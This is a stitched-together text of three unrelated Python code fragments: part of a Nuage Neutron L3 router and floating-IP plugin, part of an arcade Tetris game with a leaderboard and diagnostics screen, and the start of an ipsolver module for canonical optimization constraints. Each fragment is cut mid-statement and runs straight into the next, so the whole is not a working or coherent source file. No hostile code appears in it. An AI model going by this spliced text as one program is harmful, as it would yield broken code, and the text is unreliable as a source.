self.vsdclient.get_nuage_static_route(params) if nuage_route: route['rd'] = nuage_route['rd'] routing_mechanisms.add_nuage_router_attributes(session, router) @nuage_utils.handle_nuage_api_error @lib_db_api.retry_if_session_inactive() @log_helpers.log_method_call def create_router(self, context, router): routing_mechanisms.update_routing_values(router['router']) req_router = copy.deepcopy(router['router']) net_partition = self._get_net_partition_for_entity( context, router['router']) self._validate_create_router(context, net_partition['name'], router) neutron_router = super(NuageL3Plugin, self).create_router(context, router) nuage_router = None try: nuage_router = self.vsdclient.create_l3domain( neutron_router, req_router, net_partition, context.tenant_name) except Exception: with excutils.save_and_reraise_exception(): super(NuageL3Plugin, self).delete_router( context, neutron_router['id']) if nuage_router: LOG.debug("Created nuage domain %s", nuage_router[ 'nuage_domain_id']) with context.session.begin(subtransactions=True): nuagedb.add_entrouter_mapping(context.session, net_partition['id'], neutron_router['id'], nuage_router['nuage_domain_id'], nuage_router['rt'], nuage_router['rd']) neutron_router['net_partition'] = net_partition['id'] neutron_router['rd'] = nuage_router['rd'] neutron_router['rt'] = nuage_router['rt'] neutron_router['nuage_backhaul_vnid'] = \ nuage_router['nuage_backhaul_vnid'] neutron_router['nuage_backhaul_rd'] = \ nuage_router['nuage_backhaul_rd'] neutron_router['nuage_backhaul_rt'] = \ nuage_router['nuage_backhaul_rt'] neutron_router['nuage_router_template'] = \ nuage_router['nuage_template_id'] neutron_router['tunnel_type'] = nuage_router['tunnel_type'] neutron_router['ecmp_count'] = nuage_router['ecmp_count'] routing_mechanisms.update_nuage_router_parameters( req_router, context, neutron_router['id'] ) # adds Nuage_underlay attribute to neutron_router routing_mechanisms.add_nuage_router_attributes(context.session, neutron_router) return neutron_router def _validate_create_router(self, context, netpart_name, router): if netpart_name == constants.SHARED_INFRASTRUCTURE: msg = _("It is not allowed to create routers in " "the net_partition {}").format(netpart_name) raise n_exc.BadRequest(resource='router', msg=msg) if 'ecmp_count' in router and not context.is_admin: msg = _("ecmp_count can only be set by an admin user.") raise nuage_exc.NuageNotAuthorized(resource='router', msg=msg) @nuage_utils.handle_nuage_api_error @lib_db_api.retry_if_session_inactive() @log_helpers.log_method_call def update_router(self, context, id, router): updates = router['router'] original_router = self.get_router(context, id) self._validate_update_router(context, id, updates) routing_mechanisms.update_routing_values(updates, original_router) ent_rtr_mapping = context.ent_rtr_mapping nuage_domain_id = ent_rtr_mapping['nuage_router_id'] curr_router = self.get_router(context, id) old_routes = self._get_extra_routes_by_router_id(context, id) # Replace routes in curr_router with old_routes as the curr_router # contains also rd which disrupts rollback original_router['routes'] = old_routes with nuage_utils.rollback() as on_exc: router_updated = super(NuageL3Plugin, self).update_router( context, id, copy.deepcopy(router)) on_exc(super(NuageL3Plugin, self).update_router, context, id, {'router': copy.deepcopy(original_router)}) if 'routes' in updates: self._update_nuage_router_static_routes(id, nuage_domain_id, old_routes, updates['routes']) on_exc(self._update_nuage_router_static_routes, id, nuage_domain_id, updates['routes'], old_routes) if 'routes' in updates and len(updates) == 1: pass else: self._update_nuage_router(nuage_domain_id, curr_router, updates, ent_rtr_mapping) on_exc(self._update_nuage_router, nuage_domain_id, updates, curr_router, ent_rtr_mapping) nuage_router = self.vsdclient.get_router_by_external(id) self._add_nuage_router_attributes(context.session, router_updated, nuage_router) routing_mechanisms.update_nuage_router_parameters( updates, context, curr_router['id']) on_exc(routing_mechanisms.update_nuage_router_parameters, original_router, context, original_router['id']) rollbacks = [] try: self.nuage_callbacks.notify( resources.ROUTER, constants.AFTER_UPDATE, self, context=context, updated_router=router_updated, original_router=original_router, request_router=updates, domain=nuage_router, rollbacks=rollbacks) except Exception: with excutils.save_and_reraise_exception(): for rollback in reversed(rollbacks): rollback[0](*rollback[1], **rollback[2]) routing_mechanisms.add_nuage_router_attributes(context.session, router_updated) return router_updated def _validate_update_router(self, context, id, router): if 'ecmp_count' in router and not context.is_admin: msg = _("ecmp_count can only be set by an admin user.") raise nuage_exc.NuageNotAuthorized(resource='router', msg=msg) ent_rtr_mapping = nuagedb.get_ent_rtr_mapping_by_rtrid(context.session, id) if not ent_rtr_mapping: msg = (_("Router %s does not hold net-partition " "assoc on VSD. extra-route failed") % id) raise n_exc.BadRequest(resource='router', msg=msg) context.ent_rtr_mapping = ent_rtr_mapping def _update_nuage_router_static_routes(self, id, nuage_domain_id, old_routes, new_routes): added, removed = helpers.diff_list_of_dict(old_routes, new_routes) routes_removed = [] routes_added = [] try: for route in removed: self._delete_nuage_static_route(nuage_domain_id, route) routes_removed.append(route) for route in added: self._add_nuage_static_route(id, nuage_domain_id, route) routes_added.append(route) except Exception as e: for route in routes_added: self._delete_nuage_static_route(nuage_domain_id, route) for route in routes_removed: self._add_nuage_static_route(id, nuage_domain_id, route) raise e def _add_nuage_static_route(self, router_id, nuage_domain_id, route): params = { 'nuage_domain_id': nuage_domain_id, 'neutron_rtr_id': router_id, 'net': netaddr.IPNetwork(route['destination']), 'nexthop': route['nexthop'] } self.vsdclient.create_nuage_staticroute(params) def _delete_nuage_static_route(self, nuage_domain_id, route): params = { "address": route['destination'], "nexthop": route['nexthop'], "nuage_domain_id": nuage_domain_id } self.vsdclient.delete_nuage_staticroute(params) def _update_nuage_router(self, nuage_id, curr_router, router_updates, ent_rtr_mapping): curr_router.update(router_updates) self.vsdclient.update_router(nuage_id, curr_router, router_updates) ns_dict = { 'nuage_rtr_rt': router_updates.get('rt', ent_rtr_mapping.get('nuage_rtr_rt')), 'nuage_rtr_rd': router_updates.get('rd', ent_rtr_mapping.get('nuage_rtr_rd')) } nuagedb.update_entrouter_mapping(ent_rtr_mapping, ns_dict) @nuage_utils.handle_nuage_api_error @lib_db_api.retry_if_session_inactive() @log_helpers.log_method_call def delete_router(self, context, id): neutron_router = self.get_router(context, id) session = context.session ent_rtr_mapping = nuagedb.get_ent_rtr_mapping_by_rtrid(session, id) # Can probably be removed after blueprint enginefacade-switch reaches # router-delete code upstream. # https://blueprints.launchpad.net/neutron/+spec/enginefacade-switch try: session.expunge(ent_rtr_mapping) except Exception as e: LOG.warn('Got exception when expunging session: {}'.format(str(e))) if ent_rtr_mapping: LOG.debug("Enterprise to router mapping found for router %s", id) filters = { 'device_id': [id], 'device_owner': [lib_constants.DEVICE_OWNER_ROUTER_INTF] } ports = self.core_plugin.get_ports(context, filters) if ports: raise l3_exc.RouterInUse(router_id=id) nuage_domain_id = ent_rtr_mapping['nuage_router_id'] vsd_retry_error_codes = [(vsd_constants.CONFLICT_ERR_CODE, vsd_constants.VSD_VM_EXISTS_ON_VPORT), (vsd_constants.CONFLICT_ERR_CODE, vsd_constants.VSD_PG_IN_USE), (vsd_constants.CONFLICT_ERR_CODE, vsd_constants.VSD_VM_EXIST)] nuage_utils.retry_on_vsdclient_error( self.vsdclient.delete_l3domain, nr_attempts=cfg.CONF.RESTPROXY. server_max_retries_on_domain_delete, vsd_error_codes=vsd_retry_error_codes)(nuage_domain_id) super(NuageL3Plugin, self).delete_router(context, id) if ent_rtr_mapping and not self._check_router_subnet_for_tenant( context, neutron_router['tenant_id']): LOG.debug("No router/subnet found for tenant %s", neutron_router['tenant_id']) user_id, group_id = self.vsdclient.get_usergroup( neutron_router['tenant_id'], ent_rtr_mapping['net_partition_id']) self.vsdclient.delete_user(user_id) self.vsdclient.delete_group(group_id) @log_helpers.log_method_call def _check_fip_on_port_with_multiple_ips(self, context, port_id): # Block associating a fip to a port with multiple ip as of 5.3.1 if port_id: port = self.core_plugin._get_port(context, port_id) fixed_ips = port['fixed_ips'] if not fixed_ips: return ipv4s, ipv6s = self.count_fixed_ips_per_version(fixed_ips) if ipv4s > 1 or ipv6s > 1: msg = _('floating ip cannot be associated to ' 'port {} because it has multiple ipv4 or multiple ipv6' 'ips.').format(port_id) raise nuage_exc.NuageBadRequest(msg=msg) @log_helpers.log_method_call def _check_floatingip_update(self, context, port, vport_type=constants.VM_VPORT, vport_id=None): filter = {'fixed_port_id': [port['id']]} local_fip = self.get_floatingips(context, filters=filter) if local_fip: fip = local_fip[0] self._create_update_floatingip(context, fip, port['id'], vport_type=vport_type, vport_id=vport_id, rate_update=False) @log_helpers.log_method_call def _create_update_floatingip(self, context, neutron_fip, port_id, last_known_router_id=None, vport_type=constants.VM_VPORT, vport_id=None, rate_update=True): ent_rtr_mapping, fip_pool, nuage_vport = self._validate_processing_fip( context, last_known_router_id, neutron_fip, port_id, vport_id, vport_type) params = { 'fip_id': neutron_fip['id'], } fip = self.vsdclient.get_nuage_fip_by_id(params) if not fip: LOG.debug("Floating ip not found in VSD for fip %s", neutron_fip['id']) params = { 'nuage_rtr_id': ent_rtr_mapping['nuage_router_id'], 'nuage_fippool_id': fip_pool['nuage_fip_pool_id'], 'neutron_fip_ip': neutron_fip['floating_ip_address'], 'neutron_fip_id': neutron_fip['id'] } fip = self.vsdclient.create_nuage_floatingip_details( params) nuage_fip_id = fip['ID'] nuage_fip_associated = fip['assigned'] needs_fip_association = not nuage_fip_associated else: nuage_fip_id = fip['nuage_fip_id'] nuage_fip_associated = fip['nuage_assigned'] needs_fip_association = not nuage_fip_associated if nuage_vport and nuage_fip_associated: n_vport = self.vsdclient.get_vport_assoc_with_fip(nuage_fip_id) if n_vport and n_vport['ID'] != nuage_vport['ID']: needs_fip_association = True old_os_port_id = strip_cms_id(n_vport['externalID']) disassoc_params = { 'nuage_vport_id': n_vport['ID'], 'nuage_fip_id': None } self.vsdclient.update_nuage_vm_vport(disassoc_params) self.vsdclient.delete_rate_limiting( n_vport['ID'], neutron_fip['id']) self.fip_rate_log.info('FIP %s (owned by tenant %s) ' 'disassociated from port %s' % ( neutron_fip['id'], neutron_fip['tenant_id'], old_os_port_id)) if (nuage_vport['domainID'] != ent_rtr_mapping['nuage_router_id']): nuage_fip_id = self._move_fip_to_different_domain( context, ent_rtr_mapping, fip_pool, neutron_fip, nuage_vport['domainID']) else: nuage_fip_id = fip['nuage_fip_id'] if nuage_vport and needs_fip_association: params = { 'nuage_vport_id': nuage_vport['ID'], 'nuage_fip_id': nuage_fip_id } self.vsdclient.update_nuage_vm_vport(params) self.fip_rate_log.info( 'FIP %s (owned by tenant %s) associated to port %s' % (neutron_fip['id'], neutron_fip['tenant_id'], port_id)) # Check if we have to associate a FIP to a VIP self._process_fip_to_vip(context, port_id, nuage_fip_id) if rate_update: self._process_fip_rate_limiting(neutron_fip, nuage_vport) def _move_fip_to_different_domain(self, context, ent_rtr_mapping, fip_pool, neutron_fip, new_domain_id): fip_dict = { 'fip_id': neutron_fip['id'], 'fip_last_known_rtr_id': ent_rtr_mapping['router_id'] } self._delete_nuage_fip(context, fip_dict) LOG.debug("Floating ip on VSD is deleted for fip %s", neutron_fip['id']) params = { 'nuage_rtr_id': new_domain_id, 'nuage_fippool_id': fip_pool['nuage_fip_pool_id'], 'neutron_fip_ip': neutron_fip['floating_ip_address'], 'neutron_fip_id': neutron_fip['id'] } nuage_fip_id = self.vsdclient.create_nuage_floatingip( params) return nuage_fip_id def _validate_processing_fip(self, context, last_known_router_id, neutron_fip, port_id, vport_id, vport_type): nuage_vport = None if last_known_router_id: rtr_id = last_known_router_id else: rtr_id = neutron_fip['router_id'] net_id = neutron_fip['floating_network_id'] subn = nuagedb.get_ipalloc_for_fip(context.session, net_id, neutron_fip['floating_ip_address']) subnet_mapping = nuagedb.get_subnet_l2dom_by_id(context.session, subn['subnet_id']) fip_pool = self.vsdclient.get_nuage_fip_pool_by_id( subnet_mapping['nuage_subnet_id']) if not fip_pool: msg = _('sharedresource %s not found on VSD') % subn['subnet_id'] raise n_exc.BadRequest(resource='floatingip', msg=msg) ent_rtr_mapping = nuagedb.get_ent_rtr_mapping_by_rtrid(context.session, rtr_id) if not ent_rtr_mapping: msg = _('router %s is not associated with ' 'any net-partition') % rtr_id raise n_exc.BadRequest(resource='floatingip', msg=msg) if port_id: port_details = self.core_plugin._get_port(context, port_id) if self.needs_vport_for_fip_association( port_details.get('device_owner')): nuage_vport = self._get_vport_for_fip(context, port_id, vport_type=vport_type, vport_id=vport_id, required=True) else: nuage_vport = self._get_vport_for_fip(context, port_id, vport_type=vport_type, vport_id=vport_id, required=False) return ent_rtr_mapping, fip_pool, nuage_vport def _process_fip_rate_limiting(self, neutron_fip, nuage_vport): # Add QOS to port for rate limiting nuage_fip_rate = neutron_fip.get('nuage_fip_rate_values') nuage_fip_rate_configured = nuage_fip_rate.pop('cli_configured', None) if nuage_fip_rate_configured and not nuage_vport: msg = _('Rate limiting requires the floating ip to be ' 'associated to a port.') raise nuage_exc.NuageBadRequest(msg=msg) if nuage_fip_rate_configured and not nuage_vport: del neutron_fip['nuage_fip_rate_values'] if
", rx_xposn-(rx_width/2)+20, h_5b, arcade.color.BLACK, float(20), bold = True, align="left") arcade.draw_text("Speed = (# of Levels) - Current Level + GAME_SPEED_FLOOR", rx_xposn-(rx_width/2)+20, h_5b-25, arcade.color.GRAY, float(15), bold = True, align="left") if self.GAME_SPEED is not None: t_5b = f"{self.GAME_SPEED} frames" arcade.draw_text(t_5b, rx_xposn-(rx_width/2)+200, h_5b, arcade.color.BRIGHT_NAVY_BLUE, float(20), bold = True, align="left") # Frame Counter h_1 = rx_yposn+(rx_height/2)-175 arcade.draw_text("Frame Counter: ", rx_xposn-(rx_width/2)+20, h_1, arcade.color.BLACK, float(20), bold = True, align="left") arcade.draw_text(str(self.frame_count), rx_xposn-(rx_width/2)+200, h_1, arcade.color.BRIGHT_NAVY_BLUE, float(20), bold = True, align="left") # FPS h_3 = rx_yposn+(rx_height/2)-200 arcade.draw_text("FPS: ", rx_xposn-(rx_width/2)+20, h_3, arcade.color.BLACK, float(20), bold = True, align="left") if self.fps is not None: t_4a = f"{self.fps:.2f}" arcade.draw_text(t_4a, rx_xposn-(rx_width/2)+200, h_3, arcade.color.BRIGHT_NAVY_BLUE, float(20), bold = True, align="left") h_4 = rx_yposn+(rx_height/2)-225 arcade.draw_text("Time To Update: ", rx_xposn-(rx_width/2)+20, h_4, arcade.color.BLACK, float(20), bold = True, align="left") if self.processing_time is not None: t_4b = f"{self.processing_time:.8f} seconds" arcade.draw_text(t_4b, rx_xposn-(rx_width/2)+200, h_4, arcade.color.BRIGHT_NAVY_BLUE, float(20), bold = True, align="left") # Levels h_2 = rx_yposn+(rx_height/2)-275 t_2a = str(self.GAME_LEVEL_FRAMES[0:5]) t_2b = str(self.GAME_LEVEL_FRAMES[6:]) arcade.draw_text("Level Advance: ", rx_xposn-(rx_width/2)+20, h_2, arcade.color.BLACK, float(20), bold = True, align="left") arcade.draw_text(t_2a, rx_xposn-(rx_width/2)+200, h_2, arcade.color.BRIGHT_NAVY_BLUE, float(20), bold = True, align="left") arcade.draw_text(t_2b, rx_xposn-(rx_width/2)+200, h_2-30, arcade.color.BRIGHT_NAVY_BLUE, float(20), bold = True, align="left") def draw_grid(self, grid, offset_x, offset_y): """ Draw the grid. Used to draw the falling stones. The board is drawn by the sprite list. """ # Draw the grid for row in range(len(grid)): for column in range(len(grid[0])): # Figure out what color to draw the box if grid[row][column]: color = colors[grid[row][column]] # Do the math to figure out where the box is x = (MARGIN + WIDTH) * (column + offset_x) + SCREEN_MARGIN + WIDTH // 2 + WINDOW_MARGIN #MAY NEED FIXED WITH NEW SCREEN SIZE y = TETRIS_HEIGHT - HIDE_BOTTOM - (MARGIN + HEIGHT) * (row + offset_y) + SCREEN_MARGIN + HEIGHT // 2 #MAY NEED FIXED WITH NEW SCREEN SIZE # Draw the box arcade.draw_rectangle_filled(x, y, WIDTH, HEIGHT, color) # Advertisement Note arcade.draw_rectangle_filled(WINDOW_WIDTH/2, 72, SCREEN_WIDTH, HEIGHT, arcade.color.BLACK) arcade.draw_text("REGISTER TODAY @ HACK.OSU.EDU/2021", WINDOW_WIDTH/2, 78, arcade.color.WHITE, float(9), bold = True, align="center", anchor_x="center", anchor_y="center") def on_draw(self): """ Render the screen. """ # RX & Statistics start_time = timeit.default_timer() fps_calc_freq = 60 if self.frame_count % fps_calc_freq == 0: if self.fps_start_timer is not None: t_total = timeit.default_timer() - self.fps_start_timer self.fps = fps_calc_freq / t_total self.fps_start_timer = timeit.default_timer() #restart timer # This command has to happen before we start drawing arcade.start_render() self.draw_background() self.build_mscb() self.draw_next_stone() self.write_name() self.game_diagnostics() self.board_sprite_list.draw() self.draw_grid(self.stone, self.stone_x, self.stone_y) if self.game_over == True and self.addedScore == False : ALL_SCORES.append( [ self.score, self.player_name, self.level ] ) #calls to function to add player to leaderboard self.addedScore = True ALL_SCORES.sort(reverse = True ) saveScores(ALL_SCORES) print("Added score & Sorted Scoreboard") print(ALL_SCORES) if self.game_over == True: self.game_over_cover() def game_over_cover(self): time.sleep(.2) arcade.draw_rectangle_filled(WINDOW_WIDTH/2, SCREEN_HEIGHT/2, SCREEN_WIDTH, SCREEN_HEIGHT, (0,0,0,200)) gameover = arcade.load_texture(GAME_OVER) arcade.draw_texture_rectangle( center_x=WINDOW_WIDTH // 2, center_y=SCREEN_HEIGHT * 5/6, width= SCREEN_WIDTH*0.7, height= SCREEN_WIDTH*0.4, texture=gameover) # player and score name = self.player_name score = str(self.score) arcade.draw_text("CHALLENGER", WINDOW_WIDTH/2, SCREEN_HEIGHT*7/12, arcade.color.WHITE, 30, bold=True, align="center", anchor_x="center", anchor_y="center") arcade.draw_text(name, WINDOW_WIDTH/2, SCREEN_HEIGHT*7/12-80, arcade.color.WHITE, 40, bold=True, align="center", anchor_x="center") arcade.draw_text("SCORE", WINDOW_WIDTH/2, SCREEN_HEIGHT*5/12, arcade.color.WHITE, 30, bold=True, align="center", anchor_x="center", anchor_y="center") arcade.draw_text(score, WINDOW_WIDTH/2, SCREEN_HEIGHT*5/12-60, arcade.color.WHITE, 40, bold=True, align="center", anchor_x="center", anchor_y="center") def switch_to_leaderboard(self): time.sleep(3) next_view = LBView() next_view.setup(self.score, self.player_name) self.window.show_view(next_view) def write_name(self): """ Draw the mini score board when the player start playing. """ player_name = f"{self.player_name}" arcade.draw_text("- CURRENT CHALLENGER -", SCREEN_WIDTH/2 + WINDOW_MARGIN, SCREEN_HEIGHT*0.9, arcade.color.BLACK, float(SCREEN_HEIGHT*0.021), align="center", anchor_x="center", anchor_y="center") arcade.draw_text(player_name, SCREEN_WIDTH/2 + WINDOW_MARGIN, SCREEN_HEIGHT*0.87, arcade.color.BLACK, float(SCREEN_HEIGHT*0.02), bold=True, width=340, align="center", anchor_x="center", anchor_y="center") def build_mscb(self): """ Draw the mini score board when the player start playing. """ score_text = f"{self.score}" level_text = f"{self.level}" arcade.draw_rectangle_outline(e_mscb_xposn, e_mscb_yposn, e_mscb_width, e_mscb_height, [0,153,153], 2) arcade.draw_text("SCORE", e_mscb_xposn-65, e_mscb_yposn - e_mscb_height*0, arcade.color.BLACK, float(SCREEN_HEIGHT*0.013), bold = True, align="left", anchor_y="center") arcade.draw_text(score_text, e_mscb_xposn-50, e_mscb_yposn - e_mscb_height*0.3, arcade.color.BLACK, float(SCREEN_HEIGHT*0.030), bold = True, align="left", anchor_y="center") arcade.draw_text("LEVEL", e_mscb_xposn-65, e_mscb_yposn + e_mscb_height*0.4, arcade.color.BLACK, float(SCREEN_HEIGHT*0.013), bold = True, align="left", anchor_y="center") arcade.draw_text(level_text, e_mscb_xposn+00, e_mscb_yposn + e_mscb_height*0.2, arcade.color.BLACK, float(SCREEN_HEIGHT*0.030), bold = True, align="left", anchor_y="center") arcade.draw_rectangle_outline(next_xposn, next_yposn, next_width, next_height, [0,153,153], 2) #-- Game Logic def update(self, dt): """ Update, drop stone if warrented. Called by Arcade Class every 1/60 sec""" # RX & Statistics (start timer) start_time = timeit.default_timer() #------------------------------------ FRAME RATE CONTROL self.frame_count += 1 if self.game_over == True: self.switch_to_leaderboard() if self.frame_count % self.GAME_SPEED == 0: if self.joystick and (self.joystick.y > 0.6): self.drop() # DOWN (vertical is flipped on input) self.drop() #- Update Game Speed self.level_up() #- JOYSTICK # if self.joystick and (self.frame_count % 3 == 0): # """JoyStick Control Input""" # if self.joystick.x < -0.6: self.move(-1) # LEFT # if self.joystick.x > 0.6: self.move(1) # RIGHT # if self.joystick.y < -0.6: self.hard_drop() # UP #- KEYBOARD if self.frame_count % 3 == 0: if self.down_pressed and self.frame_count - self.down_pressed > 10: self.drop() if not self.right_pressed and self.left_pressed and self.frame_count - self.left_pressed > 10: self.move(-1) elif not self.left_pressed and self.right_pressed and self.frame_count - self.right_pressed > 10: self.move(1) # RX & Statistics (stop timer) self.processing_time = timeit.default_timer() - start_time def level_up(self): """ increase game speed as game progresses. ie. Get's faster the longer you play""" idx = len(self.GAME_LEVEL_FRAMES) - 1 while idx >= 0: if self.GAME_LEVEL_FRAMES[idx] < self.frame_count: self.level = idx self.GAME_SPEED = len(self.GAME_LEVEL_FRAMES)-idx + GAME_SPEED_FLOOR break idx -= 1 def update_board(self): """ Update the sprite list to reflect the contents of the 2d grid """ for row in range(len(self.board)): for column in range(len(self.board[0])): v = self.board[row][column] i = row * COLUMN_COUNT + column self.board_sprite_list[i].set_texture(v) def on_key_press(self, key, modifiers): """ Handle user key presses User goes left, move -1 User goes right, move 1 Rotate stone, or drop down F1 = MENU F2 = LeaderBoard F3 = Game Reset """ global GAME_SPEED_FLOOR # GAME Play Commands if key == arcade.key.LEFT: self.left_pressed = self.frame_count self.move(-1) elif key == arcade.key.RIGHT: self.right_pressed = self.frame_count self.move(1) elif key == arcade.key.UP: self.rotate_stone() elif key == arcade.key.DOWN or key==101: self.down_pressed = self.frame_count self.drop() elif key == arcade.key.SPACE or key == 113: self.hard_drop() # GAME Central Commands elif key == 65470: print("---- MAIN MENU") next_view = MenuView() self.window.show_view(next_view) elif key == 65471 or key == 65474: print("---- LEADER BOARD") next_view = LBView() next_view.setup() self.window.show_view(next_view) elif key == 65472: print("---- NEW PLAYER") next_view = PNameView() next_view.setup() self.window.show_view(next_view) elif key == 65365: GAME_SPEED_FLOOR+=1 print("---- GAME_SPEED_FLOOR = " + str(GAME_SPEED_FLOOR)) elif key == 65366: if GAME_SPEED_FLOOR > 0: GAME_SPEED_FLOOR-=1 print("---- GAME_SPEED_FLOOR = " + str(GAME_SPEED_FLOOR)) def on_key_release(self, key, modifiers): """ Handle user key presses User goes left, move -1 User goes right, move 1 Rotate stone, or drop down F1 = MENU F2 = LeaderBoard F3 = Game Reset """ # GAME Play Commands if key == arcade.key.LEFT: self.left_pressed = False elif key == arcade.key.RIGHT: self.right_pressed = False elif key == arcade.key.DOWN: self.down_pressed = False #=============================================================================== class MenuView(arcade.View): def on_show(self): arcade.set_background_color([187,0,0]) # Set Background. Required. Do not delete def! def on_draw(self): arcade.start_render() # BACKGROUND self.background = arcade.load_texture(BACKGROUNDS[1]) arcade.draw_texture_rectangle( center_x = WINDOW_WIDTH // 2, center_y = SCREEN_HEIGHT // 2, width = SCREEN_WIDTH, height = SCREEN_HEIGHT, texture = self.background ) # BUTTON GRAPHICS :D # Buttons are not intended to be clickable button = arcade.load_texture(BUTTONS[0]) arcade.draw_texture_rectangle( center_x=WINDOW_WIDTH // 2, center_y=SCREEN_HEIGHT // 2 + TOWER_BUFFER, width= SCREEN_WIDTH*0.58, height= SCREEN_HEIGHT*0.04, texture=button) button = arcade.load_texture(BUTTONS[1]) arcade.draw_texture_rectangle( center_x=WINDOW_WIDTH // 2, center_y=SCREEN_HEIGHT // 2 - (SCREEN_HEIGHT*0.05) + TOWER_BUFFER, width= SCREEN_WIDTH*0.58, height= SCREEN_HEIGHT*0.04, texture=button) button = arcade.load_texture(BUTTONS[2]) arcade.draw_texture_rectangle( center_x=WINDOW_WIDTH // 2, center_y=SCREEN_HEIGHT // 2 - (SCREEN_HEIGHT*0.1) + TOWER_BUFFER, width= SCREEN_WIDTH*0.58, height= SCREEN_HEIGHT*0.04, texture=button) # TEXT - using graphic/textures for buttons now #arcade.draw_text("[S] BEGIN GAME", SCREEN_WIDTH/2, SCREEN_HEIGHT/2, # arcade.color.CADET_GREY, font_size=15, font_name='arial', # align="center", anchor_x="center", anchor_y="center") #arcade.draw_text("[L] LEADER BOARD", SCREEN_WIDTH/2, SCREEN_HEIGHT/2 - 30, # arcade.color.CADET_GREY, font_size=15, font_name='arial', # align="center", anchor_x="center", anchor_y="center") def on_mouse_press(self, x, y, button, modifiers): print("Clicking doesn't do anything") def on_key_press(self, key, modifiers): if key == 65470: print("---- RELOAD MAIN MENU") next_view = MenuView() self.window.show_view(next_view) if key == 65471 or key == 65474: print("---- LEADER BOARD") next_view = LBView() next_view.setup() self.window.show_view(next_view) if key == 65472: print("---- NEW PLAYER") next_view = PNameView() next_view.setup() self.window.show_view(next_view) if key == 65307: arcade.close_window() #=============================================================================== class LBView(arcade.View): def on_show(self): # Set Background. Required. Do not delete def! arcade.set_background_color([187,0,0]) def
<filename>ipsolver/_canonical_constraint.py from __future__ import division, print_function, absolute_import import numpy as np import scipy.sparse as spc from ._constraints import (NonlinearConstraint, LinearConstraint, BoxConstraint) __all__ = ['CanonicalConstraint', 'to_canonical', 'lagrangian_hessian', 'empty_canonical_constraint'] class CanonicalConstraint: """Canonical constraint Constraint of the form: c_ineq <= 0 c_eq = 0 for: c_ineq, c_eq = constr(x) """ def __init__(self, n_vars, n_ineq, n_eq, constr, jac, hess, sparse_jacobian, enforce_feasibility, x0, c_ineq0, c_eq0, J_ineq0, J_eq0): # Dimensions self.n_vars = n_vars self.n_ineq = n_ineq self.n_eq = n_eq # Objective function and constraints self.constr = constr self.jac = jac self.hess = hess # Use sparse jacobian flag self.sparse_jacobian = sparse_jacobian # Enforce feasibility for CanonicalConstraint. Should # be a list of booleans (and never a single boolean value, # as it is allowed for Box, Linear and Nonlinear constraints). self.enforce_feasibility = enforce_feasibility # Initial Values self.x0 = x0 self.c_ineq0 = c_ineq0 self.c_eq0 = c_eq0 self.J_ineq0 = J_ineq0 self.J_eq0 = J_eq0 def to_canonical(constraints): """Convert constraints or list of constraints to canonical format.""" # Put ``constraints`` in list format whe needed if isinstance(constraints, (NonlinearConstraint, LinearConstraint, BoxConstraint, CanonicalConstraint)): constraints = [constraints] if isinstance(constraints, (list, tuple, np.array)): # Converts all constraints to canonical format constraints_list = [] for c in constraints: if isinstance(c, CanonicalConstraint): constraints_list += [c] elif isinstance(c, (NonlinearConstraint)): constraints_list += [_nonlinear_to_canonical(c)] elif isinstance(c, (LinearConstraint)): constraints_list += [_linear_to_canonical(c)] elif isinstance(c, (BoxConstraint)): constraints_list += [_box_to_canonical(c)] else: raise ValueError("Unknown Constraint type.") # Concatenate constraints if len(constraints_list) == 0: raise ValueError("Empty list.") elif len(constraints_list) == 1: constr = constraints_list[0] else: constr = _concatenate_canonical_constraints(constraints_list) else: raise ValueError("Unknown Constraint type.") return constr def evaluated_to_canonical(constraints, list_c, list_J, n_vars, n_eq, n_ineq, sparse_jacobian): n_constr = len(constraints) new_list_c = [] new_list_J = [] for i in range(n_constr): constr = constraints[i] c = list_c[i] J = list_J[i] eq, ineq, val_eq, val_ineq, sign, fun_len \ = _parse_constraint(constr.kind) new_list_c += [_convert_constr(c, n_vars, n_eq, n_ineq, eq, ineq, val_eq, val_ineq, sign)] if constr.sparse_jacobian: new_list_J += [_convert_sparse_jac(J, n_vars, n_eq, n_ineq, eq, ineq, val_eq, val_ineq, sign)] else: new_list_J += [_convert_dense_jac(J, n_vars, n_eq, n_ineq, eq, ineq, val_eq, val_ineq, sign)] if sparse_jacobian: c_ineq, c_eq = _concatenate_constr(new_list_c) J_ineq, J_eq = _concatenate_sparse_jac(new_list_J) else: c_ineq, c_eq = _concatenate_constr(new_list_c) J_ineq, J_eq = _concatenate_dense_jac(new_list_J) return c_ineq, c_eq, J_ineq, J_eq def lagrangian_hessian(constraint, hess): """Generate lagrangian hessian.""" # Concatenate Hessians def lagr_hess(x, v_eq=np.empty(0), v_ineq=np.empty(0)): n = len(x) hess_list = [] if hess is not None: hess_list += [hess(x)] if constraint.hess is not None: hess_list += [constraint.hess(x, v_eq, v_ineq)] def matvec(p): result = np.zeros_like(p) for h in hess_list: result += h.dot(p) return result return spc.linalg.LinearOperator((n, n), matvec) return lagr_hess def empty_canonical_constraint(x0, n_vars, sparse_jacobian=None): """Return empty CanonicalConstraint.""" n_eq = 0 n_ineq = 0 empty_c = np.empty(0) if sparse_jacobian or (sparse_jacobian is None): empty_J = spc.csr_matrix(np.empty((0, n_vars))) else: empty_J = np.empty((0, n_vars)) def constr(x): return empty_c, empty_c def jac(x): return empty_J, empty_J enforce_feasibility = np.empty(0, dtype=bool) return CanonicalConstraint(n_vars, n_ineq, n_eq, constr, jac, None, True, enforce_feasibility, x0, empty_c, empty_c, empty_J, empty_J) # ************************************************************ # # ********** Auxiliar Functions ********** # # ************************************************************ # def _nonlinear_to_canonical(nonlinear): # Parse constraints eq, ineq, val_eq, val_ineq, sign, fun_len \ = _parse_constraint(nonlinear.kind) # Get dimensions n_eq = len(eq) n_ineq = len(ineq) n_vars = nonlinear.n def new_constr(x): c = nonlinear.fun(x) return _convert_constr(c, n_vars, n_eq, n_ineq, eq, ineq, val_eq, val_ineq, sign) c_ineq0, c_eq0 = _convert_constr(nonlinear.f0, n_vars, n_eq, n_ineq, eq, ineq, val_eq, val_ineq, sign) if nonlinear.sparse_jacobian: def new_jac(x): J = nonlinear.jac(x) return _convert_sparse_jac(J, n_vars, n_eq, n_ineq, eq, ineq, val_eq, val_ineq, sign) J_ineq0, J_eq0 = _convert_sparse_jac(nonlinear.J0, n_vars, n_eq, n_ineq, eq, ineq, val_eq, val_ineq, sign) else: def new_jac(x): J = nonlinear.jac(x) return _convert_dense_jac(J, n_vars, n_eq, n_ineq, eq, ineq, val_eq, val_ineq, sign) J_ineq0, J_eq0 = _convert_dense_jac(nonlinear.J0, n_vars, n_eq, n_ineq, eq, ineq, val_eq, 